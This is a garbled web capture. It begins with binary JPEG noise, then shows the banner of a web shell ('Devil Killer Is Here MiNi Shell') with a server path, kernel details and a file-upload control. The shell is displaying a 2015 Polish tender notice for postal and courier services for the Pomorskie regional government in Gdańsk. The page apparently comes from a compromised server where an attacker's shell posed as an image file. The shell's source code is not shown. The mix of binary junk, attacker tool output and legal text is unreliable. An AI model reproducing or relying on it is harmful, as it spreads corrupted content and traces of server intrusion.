JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151020/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151020/152951-N-2015.html

<p class="kh_header"><b>Gdańsk: USŁUGI POCZTOWE W OBROCIE KRAJOWYM I ZAGRANICZNYM</b><br>
<b>Numer ogłoszenia: 152951 - 2015; data zamieszczenia: 20.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Pomorskie , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 58 3261555, faks 58 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.pomorskie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI POCZTOWE W OBROCIE KRAJOWYM I ZAGRANICZNYM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym 
i zagranicznym, w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych, kurierskich oraz paczek i ich ewentualnych zwrotów w rozumieniu ustawy Prawo Pocztowe z dnia 
23 listopada 2012 r. (Dz. U. z 2012 r., poz. 1529) na rzecz Zamawiającego z siedzib: 
1. ul. Okopowa 21/27, 80-810 Gdańsk
2. ul. Jaracza 18a, 76-200 Słupsk;
w tym przesyłek doręczanych na zasadach określonych w:
1)	ustawie z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego  (tj. Dz. U.  z 2013 r., poz. 267, ze zm.),
2)	ustawie z dnia 29 sierpnia 1997r. Ordynacja podatkowa (tj. Dz. U. z 2015 r., poz. 613),
3)	ustawie z dnia 17 listopada 1964 Kodeks postępowania cywilnego (tj. Dz. U. z 2014 r., poz. 101 ze zm.),
4)	rozporządzeniu Ministra Administracji i Cyfryzacji z dnia 26 listopada 2013 r. w sprawie reklamacji usługi pocztowej (Dz. U. z 2013 r., poz. 1468), 
5)	ustawie z dnia 23 listopada 2012 r.  Prawo Pocztowe (Dz. U. z 2012 r., poz. 1529),
6)	regulaminie Poczty Listowej, Światowy Związek Pocztowy sporządzony w Bernie dnia 28 stycznia 2005r. (Dz. U.  z 2007 r. nr 108, poz. 744),
7)	regulaminie dotyczącym Paczek pocztowych, Światowy Związek Pocztowy sporządzony w Bernie dnia 28 stycznia 2005 r. (Dz. U. z 2007 r. nr 108, poz. 745),
8)	innych powszechnie obowiązujących przepisach.

Szacowane ilości przesyłek wskazano w formularzu cenowym stanowiącym załącznik nr 4 a do SIWZ. 

Zamawiający zastrzega sobie, że co najmniej 70 % przesyłek ze zwrotnym potwierdzeniem odbioru  doręczanych jest w trybie KPA.
Zamawiający dopuszcza sporządzenie wykazu przesyłek wymagających nadania u operatora wyznaczonego. Przesyłki te mogą być ewentualnie oznaczone przez Zamawiającego w określony sposób przez Wykonawcę. 

3.	Zamawiający informuje, że:
3.1.	Przez  usługi pocztowe należy rozumieć, usługi polegające na:
1)  przyjmowaniu, przemieszczaniu i doręczaniu:
a)  przesyłek listowych do 2 000 g, w tym przesyłek poleconych i przesyłek z zadeklarowaną wartością,
b) paczek pocztowych do 30 000 g, w tym z zadeklarowaną wartością,
c) przesyłek dla ociemniałych,
2)  doręczaniu nadesłanych z zagranicy paczek pocztowych do 20 000 g.
  	
3.2	Przez przesyłki pocztowe, będące przedmiotem zamówienia rozumie się:

1) przesyłki  listowe o wadze do 50 g (gabaryt A i B):
a)	zwykłe - przesyłka nie rejestrowana nie będąca przesyłką najszybszej kategorii,
b)	zwykłe priorytetowe - przesyłka nie rejestrowana najszybszej kategorii,
c)	polecone - przesyłka rejestrowana będąca przesyłką przemieszczaną i doręczaną w sposób zabezpieczający ją przed utratą, ubytkiem zawartości lub uszkodzeniem,
d)	polecone priorytetowe - przesyłka rejestrowana najszybszej kategorii,
e)	polecone ze zwrotnym poświadczeniem odbioru (ZPO) - przesyłka przyjęta za  potwierdzeniem nadania i doręczona za pokwitowaniem odbioru,
f)	polecone priorytetowe ze zwrotnym poświadczeniem odbioru (ZPO) - przesyłka  najszybszej kategorii przyjęta za potwierdzeniem nadania i doręczona za pokwitowaniem odbioru,
g)	z zadeklarowaną wartością - przesyłka rejestrowana, za której utratę, ubytek zawartości lub uszkodzenie operator ponosi odpowiedzialność do wysokości wartości przesyłki podanej przez nadawcę.
- gdzie Gabaryt A - to przesyłka o wymiarach: Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm, Maksimum - żaden z wymiarów nie może przekroczyć wysokości 20 mm, długości 325 mm, szerokości 230 mm.
- gdzie Gabaryt B - to przesyłka o wymiarach: Minimum - jeśli choć jeden z wymiarów przekracza wysokość 20 mm lub długość 325 mm lub szerokość 230 mm, Maksimum - suma długości, szerokości i wysokości nie może być większa niż 900 mm, przy czym największy z tych wymiarów (długość) nie może przekroczyć 600 mm.

2) przesyłki listowe o wadze ponad 50 g do 2 000 g (Gabaryt A i B): 
a)	zwykłe - przesyłka nie rejestrowana nie będąca przesyłką najszybszej kategorii, 
b)	zwykłe priorytetowe - przesyłka nie rejestrowana najszybszej kategorii, 
c)	polecone - przesyłka rejestrowana będąca przesyłką, przemieszczaną i doręczaną w sposób zabezpieczający ją przed utratą, ubytkiem zawartości lub uszkodzeniem, 
d)	polecone priorytetowe - przesyłka rejestrowana najszybszej kategorii, 
e)	polecone ze zwrotnym poświadczeniem odbioru (ZPO) - przesyłka przyjęta za potwierdzeniem nadania i doręczona za pokwitowaniem odbioru, 
f)	polecone priorytetowe ze zwrotnym poświadczeniem odbioru (ZPO) - przesyłka najszybszej kategorii przyjęta za potwierdzeniem nadania i doręczona  za pokwitowaniem odbioru, 
g)	z zadeklarowaną wartością - przesyłka rejestrowana, za której utratę, ubytek zawartości lub uszkodzenie operator ponosi odpowiedzialność do wysokości wartości przesyłki podanej przez nadawcę.
- gdzie Gabaryt A - to przesyłka o wymiarach: Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x140 mm, Maksimum - żaden z wymiarów nie może przekroczyć wysokości 20 mm, długości 325 mm, szerokości 230 mm
- gdzie Gabaryt B - to przesyłka o wymiarach: Minimum - jeśli choć jeden z wymiarów przekracza wysokość 20 mm lub długość 325 mm lub szerokość 230 mm, Maksimum - suma długości, szerokości i wysokości nie może być większa niż 900 mm, przy czym największy z tych wymiarów (długość) nie może przekroczyć 600 mm.


3)	paczki pocztowe o wadze do 30 000 g (Gabaryt A i B): 
a)	zwykłe - paczki rejestrowane nie będące paczkami najszybszej kategorii, 
b)	z zadeklarowaną wartością - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii z zadeklarowaną wartością, 
c)	ze zwrotnym poświadczeniem odbioru.
- gdzie Gabaryt A - to przesyłka o wymiarach: Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm, Maksimum - żaden z wymiarów nie może przekroczyć długości 600 mm, szerokość 500 mm, wysokość 300 mm. 
- gdzie Gabaryt B - to przesyłka o wymiarach: Minimum - jeśli choć jeden z wymiarów przekracza długość 600 mm lub szerokość 500 mm lub wysokość 300 mm, Maksimum - suma długości i największego obwodu  mierzonego w innym kierunku niż długość nie może być większa niż 3 000 mm, przy czym największy wymiar nie może przekroczyć  1 500 mm.

3.3.	 Przez przesyłki kurierskie, będące przedmiotem zamówienia rozumie się:

1) przesyłki w obrocie krajowym o wadze do 50 kg:
a)	przesyłka kurierska miejska na dziś będąca przesyłką najszybszej kategorii: maksimum (tj. długość, szerokość, wysokość) nie więcej niż 250 cm z tolerancją do 2 mm, maksimum - przesyłka nie może przekraczać 1 500 mm w jakimkolwiek z wymiarów, 
b)	przesyłka kurierska miejska na dziś, o wymiarach: maksimum (tj. długość, szerokość, wysokość) nie więcej niż 250 cm z tolerancją do 2 mm, maksimum - przesyłka nie może przekraczać 1 500 mm w jakimkolwiek z wymiarów,  
c)	przesyłka kurierska krajowa na jutro rano do godz. 9:00, o wymiarach: maksimum (tj. długość, szerokość, wysokość) nie więcej niż 250 cm z tolerancją do 2 mm, maksimum - przesyłka nie może przekraczać 1 500 mm w jakimkolwiek z wymiarów,  
d)	przesyłka kurierska krajowa na jutro - standard, o wymiarach: maksimum (tj. długość, szerokość, wysokość) nie więcej niż 250 cm z tolerancją do 2 mm, maksimum - przesyłka nie może przekraczać 1 500 mm w jakimkolwiek z wymiarów, 
2)	przesyłki w obrocie zagranicznym o wadze do 20 kg, o wymiarach: minimum - strona adresowa przesyłki nie może być mniejsza niż 155 x 255 mm z tolerancją do 2 mm, maksimum - przesyłka nie może przekraczać 1 500 mm w jakimkolwiek z wymiarów ani 3 000 mm dla sumy długości
i największego obwodu mierzonego w kierunku innym niż długość.

4. Wykonawca zobowiązany będzie do: dostarczenia przesyłek, zwrotu przesyłek i odbierania przesyłek z/do siedziby Zamawiającego. 
5. Wykonawca zobowiązany będzie do:
1) dostarczenia przesyłek, zwrotu przesyłek do siedziby Zamawiającego codziennie w dni robocze, tj. od poniedziałku do piątku w godz. od 8.30 do godz. 10.00
    2) odbierania przesyłek od Zamawiającego z jego siedziby codziennie w dni robocze, tj. od poniedziałku do piątku w godz. 10.00, 12.00, 14.00. (dotyczy siedziby przy ul. Okopowej 21/27 
w Gdańsku) i o godz. 15.00 (dotyczy siedziby przy ul.  Jaracza 18a, 76-200 Słupsk.
5. Wykonawca zobowiązany będzie do co najmniej dwukrotnego  podjęcia próby doręczenia przesyłki adresatowi, tzn. dwukrotnego podjęcia zawiadomienia o próbie doręczenia przesyłki. 
6. Wykonawca zobowiązany będzie do dodatkowego stawienia się na każde wezwanie Zamawiającego w godzinach od 9.00 do 13.30  w dni robocze, tj. od poniedziałku do piątku w ciągu maksymalnie 45 minut od momentu zgłoszenia takiej potrzeby przez Zamawiającego (dotyczy tylko siedziby przy ul. Okopowej 21/27).
7. Wykonawca ma obowiązek informowania Zamawiającego o wszelkich nieprawidłowościach w oznaczeniu nadanych przesyłek, przy czym czas jego reakcji nie może być dłuższy niż 60 minut od momentu odbioru poczty (dotyczy tylko siedziby przy ul. Okopowej 21/27). W przypadku prawidłowego nadania przesyłek, Wykonawca nie ma obowiązku informowania o tym Zamawiającego. 
8. Wykonawca zobowiązany będzie do zwrotu do Zamawiającego błędnie oznaczonej przesyłki, przy czym czas ten nie może być dłuższy niż 60 minut między poinformowaniem Zamawiającego 
o niezgodnością przesyłki z książką nadawczą a dostarczeniem jej do siedziby Zamawiającego przy ul. Okopowej 21/27  w Gdańsku. 
9. Zlecenie wykonania usługi kurierskiej zgłaszane będzie przez Zamawiającego telefonicznie pod numerem linii firmowej, wskazanej przez Wykonawcę. Dowodem nadania przesyłki kurierskiej jest odcinek nalepki adresowej, potwierdzony przez pracownika Wykonawcy.
10. Zamawiający zobowiązany będzie do umieszczenia na przesyłce listowej lub paczce nazwy odbiorcy wraz z jego adresem (podany jednocześnie w pocztowej książce nadawczej), określając rodzaj przesyłki (ekonomiczna, polecona, priorytet czy ze zwrotnym poświadczeniem odbioru - ZPO) oraz umieszczania na stronie adresowej każdej nadawanej przesyłki nadruku (pieczątki) określającej pełną nazwę i adres Zamawiającego.
11. W przypadku przesyłki kurierskiej w obrocie krajowym, nalepka adresowa powinna posiadać nazwę lub imię i nazwisko, dokładny adres nadawcy i adresata, w języku polskim.
12. W przypadku przesyłki kurierskiej w obrocie zagranicznym, na nalepce adresowej Zamawiający zobowiązany będzie podać imię i nazwisko lub pełną nazwę adresata, drukowanymi literami nazwę miejscowości uzupełnioną nazwą kraju przeznaczenia oraz odpowiednim numerem kodu pocztowego lub numerem obszaru doręczenia. Wskazane jest podanie numeru telefonu adresata. Ponadto Zamawiający zobowiązany będzie do podania dokładnej nazwy i adresu nadawcy i ewentualnie numeru telefonu nadawcy.
13. Zamawiający zobowiązany będzie do właściwego przygotowania przesyłek oraz sporządzania zestawień dla przesyłek. Zestawienia dla przesyłek nie dotyczą przesyłek kurierskich.
14. Opakowanie przesyłek listowych stanowi koperta Zamawiającego, odpowiednio zabezpieczona (zaklejona lub zalakowana). Opakowanie paczki powinno stanowić zabezpieczenie uniemożliwiające dostęp do zawartości oraz uszkodzenia przesyłki w czasie przemieszczania.
15. Nadanie przesyłek objętych przedmiotem zamówienia następować będzie w dniu ich odbioru przez Wykonawcę od Zamawiającego pod warunkiem prawidłowego ich przygotowania.
16. Zamawiający wymaga, aby na dowodzie nadania przesyłki rejestrowanej w każdym przypadku pozostały dane nadawcy, jakim jest Zamawiający.
17. Zamawiający dopuszcza nadawanie przesyłek w trybie KPA, KPC, KPK przez posłańca. Wykonawca będzie tylko pośrednikiem między Zamawiającym a operatorem wyznaczonym, nadanie przesyłek nastąpi w imieniu i na rzecz Zamawiającego, Wykonawca nie zmieni jednak danych Zamawiającego na kopercie, tj. Zamawiający każdorazowo będzie figurował jako nadawca przesyłki. Wykonawca musi wszystkie koszty wkalkulować w cenę oferty. 
18. Zamawiający dopuszcza sporządzenie wykazu przesyłek wymagających nadania u operatora wyznaczonego. Przesyłki te mogą być ewentualnie oznaczone w określony sposób. 
19. Zamawiający dopuszcza możliwość nanoszenia innych nadruków/znaków opłaty na przesyłkach, o ile nie będą one zakrywać nadruku adresu firmowego Zamawiającego oraz nie będą naruszać innych wymagań wskazanych w SIWZ. 
20. Z chwilą przyjęcia przez Wykonawcę przesyłek do nadania, Wykonawca przejmuje za przyjęcie przesyłki pełną odpowiedzialność jaka spoczywa na operatorze pocztowym. 
21. Zamawiający uwzględnia przestrzeganie art. 32 Prawa Pocztowego w stosunku do Wykonawcy.
22. Zamawiający będzie stosował zpo zgodnie z wymogami prawa oraz Wykonawcy.
23. Zamawiający będzie dokonywał rozliczeń należności tylko z Wykonawcą. Podstawą rozliczeń pomiędzy Zamawiającym a Wykonawcą będzie cena jednostkowa brutto za rzeczywiste ilości wysłanej poczty. Ustalenie prawidłowej stawki VAT, zgodnie z obowiązującymi przepisami ustawy o podatku od towarów
i usług, należy do Wykonawcy.
24. Z chwilą przejęcia przez Wykonawcę przesyłek do nadania, Wykonawca przejmuje za przesyłki odpowiedzialność jaka spoczywa na operatorze pocztowym. Dopuszcza się możliwość nadawania przesyłek przez operatora pocztowego w imieniu i na rzecz Zamawiającego. Wykonawca nie zmieni jednak danych Zamawiającego na kopercie, tj. Zamawiający każdorazowo będzie figurował jako nadawca przesyłki. 
25. Zamawiający dopuszcza nadawanie przesyłek kurierskich w firmowych kopertach Wykonawcy.
26. Przesyłki dostarczane będą przez Wykonawcę do każdego wskazanego miejsca w kraju i zagranicą objętego Porozumieniem ze Światowym Związkiem Pocztowym.
27. Wykonawca będzie doręczał do Zamawiającego potwierdzenie odbioru przesyłki (ZPO) przez adresata niezwłocznie po dokonaniu doręczenia przesyłki nie później jednak niż 7 dni od dnia potwierdzenia odbioru przesyłki
28. Placówki oddawczo-awizacyjne wykonawcy, które doręczają  adresatom przesyłki  pocztowe, winny być czynne przynajmniej 5 dni w tygodniu.  
29. Placówki oddawczo-awizacyjne Wykonawcy, które doręczają adresatom przesyłki pocztowe na  terenie całego kraju winny być zlokalizowane w każdej gminie lub gminie sąsiedniej, natomiast w mieście Gdańsku winno być co najmniej 20  a w Słupsku co najmniej 5 oddawczych (tzn. awizacyjnych placówek pocztowych Wykonawcy).
30. Placówki oddawczo-awizacyjne  muszą być dostosowane dla osób niepełnosprawnych, posiadać wyodrębnione, zadaszone, dedykowane do obsługi przesyłek pocztowych miejsca, spełniać wymogi gwarantujące zabezpieczenie i ochronę danych osobowych oraz zawartych w przesyłkach informacji, spełniać wymogi Prawa pocztowego. Zamawiający wyklucza prowadzenie w placówkach oddawczo-awizacyjnych innej działalności gospodarczej, która mogłaby powodować uszkodzenie przesyłek pocztowych, bądź wpływać na jej bezpieczeństwo w zakresie ochrony danych osobowych. 
31. Wykonawca zobowiązany będzie świadczyć usługi pocztowe zgodnie z powszechnie obowiązującymi  przepisami prawa, a w szczególności:
1)	ustawą z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 1012 r., poz. 1529),
2)	rozporządzeniem Ministra Administracji i Cyfryzacji z dnia 29 kwietnia 2013 r. w sprawie warunków wykonywania usług powszechnych przez operatora wyznaczonego (Dz. U. z 2013 r., poz. 545),
3)	rozporządzeniem Ministra Administracji i Cyfryzacji z dnia 26 listopada 2013 r. w sprawie reklamacji usługi pocztowej (Dz. U. z 2013 r., poz. 1468),
4)	Umowa Międzynarodowa Siódmy protokół dodatkowy do Konstytucji Światowego Związku Pocztowego, Regulamin Generalny Światowego Związku Pocztowego wraz z załącznikiem - Regulaminem wewnętrznym Kongresów, Światowa Konwencja Pocztowa oraz Porozumienie dotyczące pocztowych usług płatniczych, sporządzone w Bukareszcie dnia 5 października 2004 r. (Dz. U. z 2007 r. nr 206, poz. 1494)
5)	Regulaminem Poczty Listowej, Światowy Związek Pocztowy sporządzony w Bernie dnia 28 stycznia 2005r. (Dz. U.  z 2007 r. nr 108, poz. 744),
6)	Regulaminem dotyczącym Paczek pocztowych, Światowy Związek Pocztowy sporządzony w Bernie dnia 28 stycznia 2005 r. (Dz. U. z 2007 r. nr 108, poz. 745),
32.  Wybrany Wykonawca zawrze z Zamawiającym umowę zgodną z warunkami przedstawionymi 
w Istotnych postanowieniach Umowy (załącznik nr 5 do SIWZ).
33. Zamawiający wskazuje rodzaje przesyłek (usług pocztowych), jakie będą zlecane Wykonawcy oraz jej szacunkową ilość w okresie obowiązywania niniejszego zamówienia (12 miesięcy). Podana ilość jest szacunkowa wskazana na podstawie analizy wysyłek w latach ubiegłych i stanowi podstawę do wyliczenia ceny oferty. 
34.W trakcie realizacji zamówienia rozliczenia między Wykonawcą a Zamawiającym będą dokonywane na podstawie rzeczywistych ilości przesyłek i zwrotów, wg cen jednostkowych brutto określonych przez Wykonawcę w Formularzu Cenowym. Faktyczne ilości realizowanych przesyłek mogą odbiegać  od podanych szacunkowej ilości. 
35.Uiszczanie opłat od przesyłek listowych będzie następowało z dołu w formie opłaty skredytowanej oraz w przypadku stosowania maszyny frankującej. Zamawiający będzie umieszczał oznaczenie potwierdzające wniesienie opłaty za usługę w postaci napisu, nadruku lub odcisku pieczęci o treści ustalonej z Wykonawcą.
36.Rzeczywiste wynagrodzenie Wykonawcy będzie obliczane jako iloczyn ilości usług zrealizowanych 
oraz cen jednostkowych określonych w formularzu cenowym, szczegółowe warunki wynagradzania zostały określone w § 8 istotnych postanowień  umowy.
37.Przewidywana ilość przesyłek różnych rodzajów została wskazana w formularzu ofertowym, stanowiącym załącznik nr 4 do SIWZ. Zamawiający zastrzega, że rzeczywiste ilości przesyłek będą wynikać z aktualnych potrzeb Zamawiającego i mogą odbiegać od ilości podanych w formularzu cenowym. Wykonawcy nie przysługuje roszczenie o wykonanie ilości przesyłek określonej w formularzu cenowym.
38.Zamawiający dopuszcza zmianę ilości w poszczególnych pozycjach wskazanych w formularzu cenowym pod warunkiem, że maksymalna wartość umowy nie przekroczy ceny brutto wskazanej w § 8 ust.1 istotnych postanowień umowy. W przypadku nadania przez Zamawiającego większej ilości przesyłek z danej kategorii, usługi te będą rozliczane wg cen jednostkowych wynikających z formularza cenowego dla tej zwiększonej kategorii.  
39.Ceny jednostkowe zaoferowane przez Wykonawcę nie będą podlegały zmianom przez okres realizacji zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1, 64.12.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:

1)	posiadania uprawnień do wykonania określonej działalności lub czynności - warunek  ten  zostanie spełniony, jeżeli Wykonawca wykaże, że posiada wpis do rejestru operatorów pocztowych wydany przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ust. 1 ustawy z dnia 23 listopada 2012 Prawo pocztowe (Dz. U. z 2012 r., poz. 1529.).
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdziale VI ust. 1 pkt 2) SIWZ oraz oświadczenia, o którym mowa w rozdz. VI ust. 1 pkt 1) SIWZ (wzór oświadczenia stanowi załącznik nr 2  do SIWZ).
2)	W prowadzonym postępowaniu mogą uczestniczyć Wykonawcy, którzy wykazali brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ustawy.
3)	Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie
3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, 
w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, chyba że Wykonawca udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.
4) W celu wykazania braku podstaw do wykluczenia z niniejszego postępowania w okolicznościach, o których mowa w art. 24 ust. 2 pkt  5 ustawy - Wykonawca wraz z  ofertą musi  złożyć listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych, albo informacje o tym, że nie należy  do grupy kapitałowej (wzór załącznik nr 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
